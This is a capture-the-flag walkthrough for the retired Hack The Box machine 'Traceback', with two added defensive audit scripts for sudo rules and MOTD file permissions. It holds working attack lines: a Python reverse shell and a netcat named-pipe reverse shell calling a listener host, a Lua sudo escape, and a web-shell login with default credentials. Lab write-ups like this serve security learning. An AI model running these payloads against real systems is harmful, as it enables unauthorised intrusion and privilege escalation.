Traceback

Name: Traceback
Release Date: 14 Mar 2020
Retire Date: 15 Aug 2020
OS: Linux
Base Points: Easy - Retired [0]
sampriti 00 days, 00 hours, 08 mins, 19 seconds
sampriti 00 days, 00 hours, 15 mins, 17 seconds
Creator: Xh4H

Again, we start with nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181

 
$ nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 13:30 EDT
Nmap scan report for 10.10.10.181
Host is up (0.059s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.71 seconds
 

We've got HTTP and SSH on their standard ports.  Let's start with the HTTP info and go from there.

Checking the HTML source gives us:

 

<!--Some of the best web shells that you might need ;)-->

 

I seem to remember something on this somewhere, so let's jump to Google and verify.

Well, at least we now have a list of filenames we can easily Gobuster with.....

 

Dump the file names into a shells.txt file and Gobust away.

 
$ gobuster dir -u http://10.10.10.181 -w shells.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       shells.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/26 13:39:49 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/08/26 13:39:51 Finished
===============================================================
 

Got one!  smevk.php is my page.  If we look at that GitHub page and the source of smevk.php, we find the creds are admin:admin 

So, we log in and ...... Huh?  smevk the crap?!?!  After my eyes stop bleeding, we see that we have the ability to execute system commands. Let's (please GOD) use this to gain a reverse shell because looking at SmEvK v3 is seriously damaging to my eyeballs.  Drop:

 

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

into the Execute section (after starting an nc -lvnp 9999 of course) and run it.  Sweet Merciful Computer Gods, we have a shell and can at least minimize the craziness.  Now, instead of worrying about the LinEnum script just yet, I'm going to jump over to the webadmin user's Home directory first.  In there we find a note.txt

The note mentions Lua and a sysadmin.  So, first let's check sudo -l and see what we can actually do.

 

$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

 

We can run "luvit" as sysadmin, but we can't see what exactly it does (except we know it executes Lua code).  Let's try this:

 

echo "require('os');" > priv.lua
echo "os.execute('/bin/bash');" >> priv.lua

sudo -u sysadmin /home/sysadmin/luvit ./priv.lua

 

Success!! We are now sysadmin.  Running bash -i gets a better interactive shell.  Grab the user flag and onward to root.
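Seen from the admin side, the sudo rule above is the whole problem: a NOPASSWD entry for a script interpreter that sits in a home directory, outside secure_path. The following is an added example, not part of the original write-up: a small audit that reads `sudo -l` output and flags such rules. The function names and the interpreter list are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: flag risky NOPASSWD rules in `sudo -l` output.

# Sample input: the `sudo -l` output quoted in the write-up.
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
EOF
}

# Reads `sudo -l` output on stdin and prints "runas<TAB>command<TAB>reasons"
# for every NOPASSWD command that is a script interpreter or lives outside
# the directories listed in secure_path.
# $1 (optional): space-separated interpreter basenames (assumed list).
audit_sudo_l() {
awk -v interp="${1:-lua luvit python python3 perl ruby node php bash sh}" '
BEGIN { n = split(interp, a, " "); for (i = 1; i <= n; i++) is_interp[a[i]] = 1 }
/secure_path=/ {
    # sudo prints the path list with escaped colons: "\:"
    sp = $0; sub(/.*secure_path=/, "", sp); gsub(/\\:/, ":", sp)
    m = split(sp, d, ":"); for (i = 1; i <= m; i++) trusted[d[i]] = 1
}
/^[ \t]*\(.*\).*NOPASSWD:/ {
    runas = $0; sub(/^[ \t]*\(/, "", runas); sub(/\).*/, "", runas)
    cmds = $0; sub(/.*NOPASSWD:[ \t]*/, "", cmds)
    k = split(cmds, c, /,[ \t]*/)
    for (i = 1; i <= k; i++) {
        split(c[i], w, " "); path = w[1]          # drop any fixed arguments
        dir = path;  sub("/[^/]*$", "", dir)      # directory part
        base = path; sub(".*/", "", base)         # file name part
        why = ""
        if (base in is_interp) why = "interpreter"
        if (!(dir in trusted)) why = why (why ? "," : "") "outside-secure_path"
        if (why != "") printf "%s\t%s\t%s\n", runas, path, why
    }
}'
}

# Stand-alone run on the sample above.
sample_sudo_l | audit_sudo_l
```

On a real host, pipe `sudo -l -U <user>` (run as root) into `audit_sudo_l` for each account that has sudo rights.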

It's a good thing that we haven't tried any scripts yet.  We unfortunately need to jump BACK to the SmEvK console and upload PSPY64.  It'll take some doing, as in you'll have to disconnect the reverse shell, upload it, and then jump back to sysadmin, but once you have it running (which you'll have to disconnect AGAIN to stop running it [maybe I should have made ssh keys as a stop-gap......]) you'll see that /etc/update-motd.d gets overwritten from a backup every 30 seconds or so.

 

/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

 

Well, crap.  It looks like I should have created those ssh keys because I need the 00-header inside of update-motd.d to run when I ssh to the system.  So, here goes.  I copy my key into the authorized_keys file (no I'm not publishing it here) and set up the replacement header as:

 

echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.14.7 4444 >/tmp/p' > /etc/update-motd.d/00-header

 

and here's where speed is of the essence.  It's nc -lvnp 4444; echo to replace the header, and then immediate ssh -i sysadmin_traceback sysadmin@10.10.10.181.  You have only 30 seconds to complete the task.
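The root step works only because a non-root account can write to scripts that pam_motd runs as root at login. The following is an added example, not part of the original write-up: a permission audit for the two directories named above. The function names are made up for the illustration, and the write-up does not show the actual file modes, so the check covers both ownership and group/other write bits.

```shell
#!/bin/sh
# Added example: find login-time scripts that a non-root account can modify.

# Print every file or directory under DIR that is not owned by OWNER
# or is writable by group or other. OWNER defaults to root.
audit_root_run_dir() {
    dir=$1
    owner=${2:-root}
    [ -d "$dir" ] || return 0
    find "$dir" \( -type f -o -type d \) \
        \( ! -user "$owner" -o -perm -020 -o -perm -002 \) \
        -print 2>/dev/null | sort
}

# Audit the directories named in the write-up: the live MOTD scripts and
# the backup that the 30-second job copies over them.
# Returns 0 when clean, 1 (after printing the paths) when something is found.
audit_motd_dirs() {
    findings=$(for d in /etc/update-motd.d /var/backups/.update-motd.d; do
        audit_root_run_dir "$d" root
    done)
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Stand-alone run: list findings, if any, on the local machine.
audit_motd_dirs || echo "paths above are modifiable by a non-root account"
```

Anything the audit prints should be reset to root ownership with mode 755 or stricter, and the group that had write access reviewed.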